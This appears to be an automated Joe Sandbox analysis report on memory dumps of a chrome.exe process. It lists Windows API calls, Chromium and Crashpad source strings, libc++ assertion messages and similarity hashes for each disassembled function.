                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID: j0Yj
                                                    • API String ID: 3213747228-2544518064
                                                    • Opcode ID: 7783142af62f6bbaebb193a5bb5dccb2a0c698df62bb349582308dae326eb2db
                                                    • Instruction ID: ef7d98ac1da4d65c99eeb4f9d623d84279887da63af48de6ca8d9925852c3194
                                                    • Opcode Fuzzy Hash: 7783142af62f6bbaebb193a5bb5dccb2a0c698df62bb349582308dae326eb2db
                                                    • Instruction Fuzzy Hash: CBB16733A00B55AFDB158F68ECC1BEEBBA5EF55314F186156E944BB283D270D900C7A0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D32F97
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D32FDA
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D330E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D330F7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D33104
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33133
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D331A4
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D32F1A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThreadUnothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    • API String ID: 1687741313-4189810390
                                                    • Opcode ID: d82decedb0b89a6ad6c078ee873a7cff1619b3049876631c9068ba124d371cb8
                                                    • Instruction ID: 68eba217f07826209a010d90c0307afdb04d32fbaa8241a875792aa0493326b9
                                                    • Opcode Fuzzy Hash: d82decedb0b89a6ad6c078ee873a7cff1619b3049876631c9068ba124d371cb8
                                                    • Instruction Fuzzy Hash: D3B15D71A043059FC708DF19D885A6ABBE5FF88304F18852DF889AB351DB34ED45CBA2
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,00D46E87,?), ref: 00D487CF
                                                    • DeleteFileW.KERNEL32(00000000,00D46E8B), ref: 00D48868
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseDeleteFileHandle
                                                    • String ID: !settings.log_file_path.empty()$..\..\base\logging.cc$BaseInitLoggingImpl_built_with_NDEBUG$LOG_TO_FILE set but no log_file_path!$settings.log_file_path.empty()$vmodule
                                                    • API String ID: 2633145722-840891738
                                                    • Opcode ID: 7dc5b820b892b9699adbeaed56ee5f6ac81edadb832bb83cdf2bc740d99a6ee3
                                                    • Instruction ID: 38abd68e9a79240e2cf8ed6a5314cfd7c623b7d99f2df86c5bdeebdc284c53e7
                                                    • Opcode Fuzzy Hash: 7dc5b820b892b9699adbeaed56ee5f6ac81edadb832bb83cdf2bc740d99a6ee3
                                                    • Instruction Fuzzy Hash: 6F51F3B0F00314AFDB10EB61EC52F7E73A4AF44784F085129F916BB2C2EB74A945D6A1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00DA83E2
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA83EE
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00DA8425
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA8431
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\base\files\file_win.cc$Close$GetHandleVerifier$ScopedBlockingCall
                                                    • API String ID: 1646373207-3663164917
                                                    • Opcode ID: 1fb8321edb6a0d001df0fdcfea755fef62df2deba6453d941a561a8690a7567f
                                                    • Instruction ID: 6f62d5ae92fd4e3b3a72f8854a16d6379c415e4a3a31787a62f99183f3a3d492
                                                    • Opcode Fuzzy Hash: 1fb8321edb6a0d001df0fdcfea755fef62df2deba6453d941a561a8690a7567f
                                                    • Instruction Fuzzy Hash: E451AA706043419FD710AF25DC4573A77E5FF8A700F140929F992A72A1DF74A908DB72
                                                    APIs
                                                    • CreateEventW.KERNEL32 ref: 00D4852C
                                                    • CreateEventW.KERNEL32 ref: 00D48580
                                                    • CreateThread.KERNEL32(00000000,00000000,00D9BD20,00000000,00000000,00000000), ref: 00D485C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Create$Event$Thread
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\thread\thread_win.cc$..\..\third_party\crashpad\crashpad\util\win\session_end_watcher.cc$CreateEvent$CreateThread$Start
                                                    • API String ID: 2525963256-1853482706
                                                    • Opcode ID: c2dad51f5bb68248025ebdf8564ef9765287d5c8fa5d536b8b4b7350ec138bde
                                                    • Instruction ID: 27f9189d903cb66b06ef53604a234cf11567b785c320d7fda60da3f090e1b5ea
                                                    • Opcode Fuzzy Hash: c2dad51f5bb68248025ebdf8564ef9765287d5c8fa5d536b8b4b7350ec138bde
                                                    • Instruction Fuzzy Hash: E74129B1A403045FD720AF34AC42B6F37E9EF85740F099829F549B6282EF70D9498762
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D50C0B
                                                    • LocalFree.KERNEL32(?), ref: 00D50CD0
                                                    • GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00D50D0E
                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDescription), ref: 00D50D1A
                                                      • Part of subcall function 00E57A70: _strlen.LIBCMT ref: 00E57B89
                                                    Strings
                                                    • Kernel32.dll, xrefs: 00D50D09
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D50D40
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D50D47
                                                    • GetThreadDescription, xrefs: 00D50D14
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressCurrentFreeHandleLocalModuleProcThread_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$GetThreadDescription$Kernel32.dll
                                                    • API String ID: 3643588169-3579133721
                                                    • Opcode ID: f31fabdee166012a75163187f44c20d2d2a83e3b17c11427ffee8c1420189e80
                                                    • Instruction ID: 58eff87860cc87c0139c230cd284e23232dd5aadc9b984f0e08c58cb7781f974
                                                    • Opcode Fuzzy Hash: f31fabdee166012a75163187f44c20d2d2a83e3b17c11427ffee8c1420189e80
                                                    • Instruction Fuzzy Hash: 1441F7B1A002199FCF11EFA0DC819BE7BB4AF44715B19012AED05BB391E731A90DC6B2
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,000F4240), ref: 00DF333B
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DF3364
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF33A7
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DF342F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF346F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$Sleep
                                                    • String ID:
                                                    • API String ID: 2381004442-0
                                                    • Opcode ID: 7a0cc83c89907edb71fda9c5c20f2d50659592fbcf0760f9e15c59dba8c8e605
                                                    • Instruction ID: 28ec8c9e28abdabef9d940223129cde289e81cb5d424bbc8aec9fbafc6ce7064
                                                    • Opcode Fuzzy Hash: 7a0cc83c89907edb71fda9c5c20f2d50659592fbcf0760f9e15c59dba8c8e605
                                                    • Instruction Fuzzy Hash: 91817171A083059FC748DF29D88592BBBE9EBC8344F05892EF589D7361E730E944CB92
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(crashpad-handler,?,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E542
                                                    • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E54A
                                                    • GetCurrentProcess.KERNEL32 ref: 00E6E566
                                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00E6E572
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E58E
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E59E
                                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E5AA
                                                    • GetCurrentProcess.KERNEL32 ref: 00E6E5C9
                                                    • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 00E6E5D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$ObjectSingleWait$CodeErrorExitLastTerminate
                                                    • String ID:
                                                    • API String ID: 2432511979-0
                                                    • Opcode ID: 20ffabaf84c2e0fe6e3e2b3f271b4873d57b66dc606f8ef366c83e1ef1ada008
                                                    • Instruction ID: ffc3938b57b67ed3befab7874bcf355489a7706145c600d323a191b068b1221d
                                                    • Opcode Fuzzy Hash: 20ffabaf84c2e0fe6e3e2b3f271b4873d57b66dc606f8ef366c83e1ef1ada008
                                                    • Instruction Fuzzy Hash: 942199746442899FD7209B65F88C6AA7BA4FB05358F1C542DF443BB3D0E774E848C752
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(00000000,?,00E894F0,00000000,000000FF,00000000), ref: 00D74990
                                                    • RegisterWaitForSingleObject.KERNEL32(00000000,?,?,00000000,000000FF,00000000), ref: 00D749B6
                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,00000008,00000000,000000FF,00000008), ref: 00D749D8
                                                      • Part of subcall function 00D9BC60: CloseHandle.KERNEL32(00D485FC,?,00000000,00000000,?,00D485FC,00000000), ref: 00D9BC77
                                                    Strings
                                                    • RegisterWaitForSingleObject process end, xrefs: 00D74B69
                                                    • ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc, xrefs: 00D74AB9, 00D74B0A, 00D74B57
                                                    • RegisterWaitForSingleObject crash dump requested, xrefs: 00D74ACB
                                                    • RegisterWaitForSingleObject non-crash dump requested, xrefs: 00D74B1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ObjectRegisterSingleWait$CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$RegisterWaitForSingleObject crash dump requested$RegisterWaitForSingleObject non-crash dump requested$RegisterWaitForSingleObject process end
                                                    • API String ID: 2574254514-2013388152
                                                    • Opcode ID: 2407e8a19088ef5ef8b16c660bfc14fbdc6c6c64a729187a9187fdb42520afcb
                                                    • Instruction ID: 38421943b2056f4a96320ddce3f6ace9ae92ae90de55ec6d3de266ec70a9548f
                                                    • Opcode Fuzzy Hash: 2407e8a19088ef5ef8b16c660bfc14fbdc6c6c64a729187a9187fdb42520afcb
                                                    • Instruction Fuzzy Hash: ED7124B0A40B05AFDB21CF25D945F52B7F4BF48304F04922DE54DA7692E770E998CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D536D6
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D537C6
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D53870
                                                    Strings
                                                    • id_to_handle_iter != thread_id_to_handle_.end(), xrefs: 00D53853
                                                    • handle_to_name_iter != thread_handle_to_interned_name_.end(), xrefs: 00D53813
                                                    • RemoveName, xrefs: 00D537FC, 00D5383C
                                                    • ..\..\base\threading\thread_id_name_manager.cc, xrefs: 00D537F7, 00D53837
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\base\threading\thread_id_name_manager.cc$RemoveName$handle_to_name_iter != thread_handle_to_interned_name_.end()$id_to_handle_iter != thread_id_to_handle_.end()
                                                    • API String ID: 1678258262-1713423127
                                                    • Opcode ID: d099cd818c8ee58e4b1ae633126f16a8e2e710cbed853f993fab9a24aa60a0c6
                                                    • Instruction ID: 8c86dbebcf705e480695fd576ffcd2923435846b8e0eaa742295687ef28ef56d
                                                    • Opcode Fuzzy Hash: d099cd818c8ee58e4b1ae633126f16a8e2e710cbed853f993fab9a24aa60a0c6
                                                    • Instruction Fuzzy Hash: 7051B6B1B002059BCF249E25D85197A73F6FF98786758052DFC06A7641EB31EE09C7B1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E2916B,00E2933A,00E293A2), ref: 00E29107
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E2911D
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E29132
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: ,($AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1950051831
                                                    • Opcode ID: 090d94ca38e771914d8f94a2de80227e5a7b9e71267be59c2e52086bdcfa9df4
                                                    • Instruction ID: de14d29a1533fbc571cf4658263a9dcf152528ca723c98a686caa1551b1004f6
                                                    • Opcode Fuzzy Hash: 090d94ca38e771914d8f94a2de80227e5a7b9e71267be59c2e52086bdcfa9df4
                                                    • Instruction Fuzzy Hash: ABF08C31B432739B4F210E636DCAAB623C85A46798B0B703DE601F7242D710CC1A96D1
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?), ref: 00E7350B
                                                      • Part of subcall function 00D82B00: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00D82B92
                                                    • GetStartupInfoW.KERNEL32(?,00000000), ref: 00E732DD
                                                    Strings
                                                    • source-shortcut, xrefs: 00E73307
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E735A8
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E735AF
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E735A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryErrorInfoLastStartup
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$source-shortcut
                                                    • API String ID: 783172407-2813202532
                                                    • Opcode ID: 55e6ae087500383c5339a847f13a3b9b2e810a615abb7772261e662e54f567d7
                                                    • Instruction ID: 06550135db0506717416ca1619d5edd6923915d15bbd39b96d5e93390c8375b0
                                                    • Opcode Fuzzy Hash: 55e6ae087500383c5339a847f13a3b9b2e810a615abb7772261e662e54f567d7
                                                    • Instruction Fuzzy Hash: 02D1DEB0D01314AAEB218F61DC45BEEBBB4EB45704F10A199E4487B282E7755B09DFA1
                                                    APIs
